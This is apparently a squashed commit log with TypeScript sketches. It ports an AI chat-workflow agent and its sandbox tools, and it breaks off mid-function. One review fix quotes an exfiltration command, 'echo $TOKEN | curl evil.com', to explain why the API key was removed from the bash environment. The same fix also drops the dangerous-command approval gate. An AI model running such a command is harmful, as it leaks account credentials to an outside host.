Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives `{modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons}` on every assistant turn, matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts: port of open-agents' gateway-metadata.ts; parses gateway-reported per-step cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts: port of open-agents' usage.ts; pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts: type mirroring open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts: stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.
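The per-turn accumulation described above can be sketched as follows. This is a minimal illustration, not the code in `buildMessageMetadataCallback.ts`: the `Usage` type is a simplified stand-in for the SDK's `LanguageModelUsage` (only three counters), and the `StreamPart` shape with a per-step `cost` field is an assumption made so the sketch runs without the `ai` package. The point it shows is the pointwise sum: a counter stays `undefined` only when both sides are `undefined`, so missing data is never reported as zero.

```typescript
// Simplified stand-in for the AI SDK's LanguageModelUsage (assumption: three counters only).
type Usage = { inputTokens?: number; outputTokens?: number; totalTokens?: number };

// Pointwise add of one counter: undefined only if both sides are undefined.
function addTokenCounts(a?: number, b?: number): number | undefined {
  if (a === undefined && b === undefined) return undefined;
  return (a ?? 0) + (b ?? 0);
}

function addLanguageModelUsage(a: Usage, b: Usage): Usage {
  return {
    inputTokens: addTokenCounts(a.inputTokens, b.inputTokens),
    outputTokens: addTokenCounts(a.outputTokens, b.outputTokens),
    totalTokens: addTokenCounts(a.totalTokens, b.totalTokens),
  };
}

// Hypothetical stream-part shape: only finish-step parts carry usage and cost.
type StreamPart =
  | { type: "finish-step"; usage: Usage; cost?: number; finishReason: string }
  | { type: "text-delta"; text: string };

interface MessageMetadataSketch {
  modelId: string;
  lastStepUsage: Usage;
  totalMessageUsage: Usage;
  lastStepCost?: number;
  totalMessageCost?: number;
  stepFinishReasons: string[];
}

// Stateful factory: create one per assistant turn so totals never leak across turns.
function buildMessageMetadataCallback(modelId: string) {
  let totalUsage: Usage | undefined;
  let totalCost: number | undefined;
  const stepFinishReasons: string[] = [];

  return (part: StreamPart): MessageMetadataSketch | undefined => {
    if (part.type !== "finish-step") return undefined;
    const nextTotal: Usage = totalUsage
      ? addLanguageModelUsage(totalUsage, part.usage)
      : part.usage;
    totalUsage = nextTotal;
    if (part.cost !== undefined) totalCost = (totalCost ?? 0) + part.cost;
    stepFinishReasons.push(part.finishReason);
    return {
      modelId,
      lastStepUsage: part.usage,
      totalMessageUsage: nextTotal,
      lastStepCost: part.cost,
      totalMessageCost: totalCost,
      stepFinishReasons: [...stepFinishReasons],
    };
  };
}
```

Because the factory closes over its own totals, a fresh callback per turn is what keeps one assistant message's cost from bleeding into the next.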
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim:
- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`), identical to open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages (now returns `Promise<ModelMessage[]>`)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`, mirroring open-agents' `packages/agent/tools/task.ts`.
Yields multiple chunks during the subagent run so the chat UI can render:
- An initial "Subagent · 0 tools · 0 tokens" card with a stable startedAt timestamp
- A live `pending: {name, input}` indicator for each tool-call
- Accumulated `usage` after each finish-step
- A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: it extracts the last assistant text part from `output.final` for inclusion in the parent agent's context.

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts: wraps addLanguageModelUsage to handle undefined inputs without introducing zero-token placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime; it was previously falling through to the generic "User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
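The task tool's `toModelOutput` behavior (pull the last assistant text out of `output.final`) might look roughly like this. The message types are simplified stand-ins for the SDK's `ModelMessage`, and both the `{ type: "text", value }` return shape and the fallback string are assumptions for illustration; the `({ output })` destructuring follows the object-argument call signature the drive-by fix describes for the current SDK.

```typescript
// Simplified stand-ins for the SDK's ModelMessage content parts (assumption).
type TextPart = { type: "text"; text: string };
type ToolCallPart = { type: "tool-call"; toolName: string };
type TranscriptMessage =
  | { role: "user"; content: string }
  | { role: "assistant"; content: string | Array<TextPart | ToolCallPart> }
  | { role: "tool"; content: unknown[] };

// Walk backwards: the last non-empty assistant text is the subagent's answer.
function lastAssistantText(final: TranscriptMessage[]): string | undefined {
  for (let i = final.length - 1; i >= 0; i--) {
    const message = final[i];
    if (message.role !== "assistant") continue;
    const content = message.content;
    if (typeof content === "string") {
      if (content !== "") return content;
      continue;
    }
    for (let j = content.length - 1; j >= 0; j--) {
      const part = content[j];
      if (part.type === "text" && part.text !== "") return part.text;
    }
  }
  return undefined;
}

// Destructures `{ output }`, matching the newer SDK's object-argument call.
function toModelOutput({ output }: { output: { final?: TranscriptMessage[] } }) {
  const text = output.final ? lastAssistantText(output.final) : undefined;
  return { type: "text" as const, value: text ?? "Subagent finished without a text response." };
}
```

Only the final answer goes back to the parent model; the full transcript stays in the UI chunk, which keeps the parent's context small.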

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an `x-workflow-run-id: stub-<uuid>` header, so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts: thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts: auth → validate → session/chat ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts: Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit)

Status codes implemented (matching the contract docs):
- 200: UIMessage stream + x-workflow-run-id header
- 400: invalid JSON / invalid body / "Sandbox not initialized"
- 401: validateAuthContext passthrough
- 403: session not owned by the API key's account
- 404: session or chat not found (incl. chat under a different session)
- 500: selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId; there is no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:
1. SRP/DRY: drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead.
2. SRP: move auth + body parsing out of handleChatWorkflowStream.ts into the validator.
   Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match the new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test; both are now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A`, which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime.

Tools are still NOT wired: the workflow runs streamText with the gateway model + Recoup custom instructions only. The sandbox tool surface comes in a follow-up PR.
What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId: atomic CAS on chats.active_stream_id
- touchChat: bump chats.updated_at
- updateChat: generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists: INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage: true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId: `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions: assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage: fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream: 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts: `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts: `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn; the runAgentWorkflow loop shape is in place but only iterates once today.
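Two of the chat/recoupable helpers are small, pure string functions, so they can be sketched directly. Assumptions, not confirmed by the PR: `extractOrgId` is given either a bare `org-<slug>-<uuid>` name or a clone URL ending in one (optionally with `.git`) and returns `null` when no trailing UUID is found; `TITLE_MAX_LENGTH` is taken to be 80 from the "title-from-first-80" note; and the ellipsis handling follows the later P2 fix in this PR (one-character "…", body sliced to `max - suffix`).

```typescript
// `org-<slug>-<uuid>` at the end of a name or clone URL (optional `.git` / trailing slash).
const ORG_ID_PATTERN =
  /org-[\w-]*?-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(?:\.git)?\/?$/i;

function extractOrgId(nameOrUrl: string): string | null {
  const match = ORG_ID_PATTERN.exec(nameOrUrl);
  return match ? match[1].toLowerCase() : null;
}

const TITLE_MAX_LENGTH = 80; // assumption, inferred from "title-from-first-80"
const TITLE_SUFFIX = "…"; // a single UTF-16 code unit, unlike "..."

function truncateTitle(text: string, max: number = TITLE_MAX_LENGTH): string {
  if (text.length <= max) return text;
  // Reserve room for the suffix so the result is exactly `max` characters long.
  return text.slice(0, max - TITLE_SUFFIX.length) + TITLE_SUFFIX;
}
```

Anchoring the UUID at the end of the string means a slug that itself contains hyphens (like `rostrum-pacific`) cannot be mistaken for part of the id.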
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with an optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces the domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage, where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors.
- Extract the resume-stream block from the handler into `maybeResumeChatStream.ts` (OCP: the handler stays small, and resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: the handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). This closes the race where two requests could both bill the model before one lost the CAS. After start(), the handler promotes the placeholder to the real run id.
- updateChat returns a discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: the bare try/catch on getRun no longer clears a stale active_stream_id on transient workflow API failures; we treat any uncertainty as conflict. A failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error).
- await getRun(runId).cancel() in the handler; previously the synchronous, unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat's updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix.
- runAgentStep: acquire the writer once, release it in finally. Per-chunk writer acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). A multi-turn loop with the same input was unsafe, so the workflow now logs a warning and exits if the model returns tool-calls.

Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents. handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency.

Also tightens the cancel-throws handler test to use the same deferred-rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64, the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured:
- `lib/supabase/chats/updateChat.ts` is now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib.
- `lib/chat/compareAndSetChatActiveStreamId.ts`: new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result.
  Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline.
- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile with no type check; tsc's errors were all in `__tests__`, unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts`: `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing), which reliably discriminates the union members regardless of literal-type inference quirks.
2. `lib/supabase/chats/updateChat.ts`: `let query = supabase.from(...).update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep"; Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split the where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)`, typed back to the original builder).

Both bugs were behavior-neutral; the function shape and contract are unchanged.

37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds.
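The `updateChat` rewrite in fix 2 can be illustrated with a small pure helper: split the `where` map once, apply every equality with a single `.match()` call, then fold the `null` columns in with `.is(col, null)`. `.match()` and `.is()` are real supabase-js filter methods, but the `FilterBuilder` interface below is a deliberately tiny hypothetical stand-in so the sketch runs without Supabase; it is not the PostgrestFilterBuilder type.

```typescript
type WhereValue = string | number | boolean | null;
type Where = Record<string, WhereValue>;

// Minimal hypothetical builder surface; the real PostgrestFilterBuilder is far more generic.
interface FilterBuilder<B> {
  match(query: Record<string, string | number | boolean>): B;
  is(column: string, value: null): B;
}

// Split once: equality predicates vs. `column IS NULL` predicates.
function splitWhere(where: Where) {
  const matches: Record<string, string | number | boolean> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === null) nullColumns.push(column);
    else matches[column] = value;
  }
  return { matches, nullColumns };
}

// One `.match()` call plus a reduce over `.is()`, typed back to the same builder type B,
// instead of reassigning a `let query` inside a loop.
function applyWhere<B extends FilterBuilder<B>>(builder: B, where: Where): B {
  const { matches, nullColumns } = splitWhere(where);
  const matched = Object.keys(matches).length > 0 ? builder.match(matches) : builder;
  return nullColumns.reduce<B>((query, column) => query.is(column, null), matched);
}
```

Pinning the reduce accumulator to `B` is what stops the type from growing with each chained call, which is the failure mode the commit describes.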
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts: AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts: `{ RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID }` env builder from context.
- lib/agent/tools/bashTool.ts: direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects the recoup env on foreground execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts: factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes it into streamText as experimental_context, and uses streamText's internal multi-step loop (`stopWhen: stepCountIs(25)`) for tool-call iteration; no outer loop in runAgentWorkflow is needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, and passes it to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR; host-side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (this subsumes the cubic P1 about the broken override ordering, since the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files (no catch-all utils file):
  - `AgentContext.ts`: type
  - `isAgentContext.ts`: guard
  - `getSandbox.ts`: sandbox reconnection

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token; only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate that sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. The earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above.
- P2 (test file >100 lines): dismissed, same as in the PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines.

Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds.
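A guard with the tightened semantics from the P2 fix could look like this minimal sketch. The `AgentContext` shape is trimmed to the two sandbox fields the guard checks (an assumption; the real type carries more), and `isRecord` is a hypothetical helper introduced for readability.

```typescript
// Trimmed context shape: only what the guard validates (assumption).
interface AgentContext {
  sandbox: { state: object; workingDirectory: string };
}

// Hypothetical helper: any non-null object.
function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null;
}

// Rejects `{ sandbox: {} }`: state must be a non-null object and
// workingDirectory a non-empty string, so tools never see undefined fields.
function isAgentContext(value: unknown): value is AgentContext {
  if (!isRecord(value)) return false;
  const sandbox = value.sandbox;
  if (!isRecord(sandbox)) return false;
  const { state, workingDirectory } = sandbox;
  return isRecord(state) && typeof workingDirectory === "string" && workingDirectory.length > 0;
}
```

Failing closed here means a malformed `experimental_context` is caught at the guard instead of surfacing later as a crash inside a tool.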
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restores the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:
- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55): high enough that normal flows never hit the cap, but still bounding runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant and passes it to streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`; they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing.
New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts: read with 1-indexed offset/limit, numbered output
- writeFileTool.ts: create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts: exact-string replace, ambiguous-match rejection
- grepTool.ts: POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts: find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts: stateless planning surface; echoes the list back
- webFetchTool.ts: curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts: the `'` → `'\''` dance
- toDisplayPath.ts: absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question: most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents, where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in the PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing.

Harmonized to direct-value exports across all 8 tools:
- bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).
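Three pieces of the PR 5 surface are pure string logic and can be sketched without a sandbox. These are illustrations under assumptions, not the shipped files: `shellEscape` is assumed to wrap the value in single quotes around the `'\''` replacement; `toDisplayPath` is assumed to return `.` for the working directory itself; and `applyExactEdit` is a hypothetical core for `editFileTool` that counts non-overlapping exact matches, rejects ambiguous ones unless `replaceAll` is set, and reports the 1-indexed line of the first match.

```typescript
// Close the quote, emit an escaped quote, reopen: ' → '\''.
function shellEscape(value: string): string {
  return "'" + value.replace(/'/g, "'\\''") + "'";
}

// Relative path when inside the working directory, absolute otherwise.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, "");
  if (absolutePath === root) return ".";
  if (root !== "" && absolutePath.startsWith(root + "/")) {
    return absolutePath.slice(root.length + 1);
  }
  return absolutePath;
}

type EditResult =
  | { ok: true; content: string; count: number; startLine: number }
  | { ok: false; error: string };

function applyExactEdit(
  content: string,
  oldString: string,
  newString: string,
  replaceAll = false,
): EditResult {
  if (oldString === "") return { ok: false, error: "oldString must not be empty" };
  const pieces = content.split(oldString); // n non-overlapping matches → n + 1 pieces
  const count = pieces.length - 1;
  if (count === 0) return { ok: false, error: "oldString not found" };
  if (count > 1 && !replaceAll) {
    return { ok: false, error: `oldString matches ${count} times; add context or set replaceAll` };
  }
  // pieces[0] is everything before the first match, so its line count is the start line.
  const startLine = pieces[0].split("\n").length;
  return { ok: true, content: pieces.join(newString), count, startLine };
}
```

Checking `root + "/"` rather than a bare prefix keeps `/vercel/sandboxed` from being treated as inside `/vercel/sandbox`.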
Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project-level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty, so models in sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts: SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts: hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts: strip frontmatter, return body
- substituteArguments.ts: `$ARGUMENTS` replacement
- injectSkillDirectory.ts: prepend `Skill directory: <path>`
- discoverSkills.ts: scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts: slim, `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting

New tool: lib/agent/tools/skillTool.ts. Case-insensitive lookup; respects `disable-model-invocation`; surfaces the available-skills list on an unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, and returns the result to the model.
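The hand-rolled frontmatter subset and `$ARGUMENTS` substitution might be sketched as follows. This is an assumption-laden illustration rather than `parseSkillFrontmatter.ts` itself: it handles only flat `key: value` lines, splits on the first colon (so URLs keep their colons), strips matching single or double quotes, and maps bare `true`/`false` to booleans. `substituteArguments` uses `split`/`join` rather than `String.prototype.replace` so arguments containing `$&` or `$1` are inserted literally.

```typescript
type FrontmatterValue = string | boolean;

// Leading `---` block, captured lazily up to the closing `---` line.
const FRONTMATTER_PATTERN = /^---\r?\n([\s\S]*?)\r?\n---(?:\r?\n|$)/;

function parseSkillFrontmatter(markdown: string): Record<string, FrontmatterValue> {
  const match = FRONTMATTER_PATTERN.exec(markdown);
  if (!match) return {};
  const result: Record<string, FrontmatterValue> = {};
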